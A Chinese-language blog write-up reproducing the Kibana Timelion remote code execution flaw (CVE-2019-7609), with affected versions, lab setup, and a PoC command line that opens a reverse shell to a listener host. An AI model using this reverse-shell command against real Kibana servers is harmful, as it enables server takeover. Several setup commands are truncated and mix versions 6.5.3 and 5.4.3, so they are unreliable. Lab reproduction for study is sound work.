Kibana远程代码执⾏漏洞(CVE-2019-7609)复现
简介
攻击者利⽤漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从⽽接管所在服务器,在服务器上执⾏任意命令。
影响版本
Kibana < 6.6.1
Kibana < 5.6.15
环境搭建
⾸先去官⽹下载6.5.3的tar包并解压cve漏洞库
tar -zxvf elasticsearch-6.5.
然后运⾏
cd elasticsearch-6.5.3
./bin/elasticsearch
不要⽤root⽤户运⾏
证明成功了
Kibana安装
官⽹下载压缩包并解压
wget /downloads/kibana/kibana-6.5.3-linux-x86_ tar –zxvf kibana-5.4.3-linux-x86_
直接运⾏
cd kibana-5.4.3-linux-x86_64
./bin/kibana
我们这⾥搭建的版本是6.5.3
漏洞复现
Poc地址
python 1.py -u 127.0.0.1:5601 -host 192.168.220.137 -port 6666 --shell 运⾏命令进⾏反弹shell
反弹成功
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论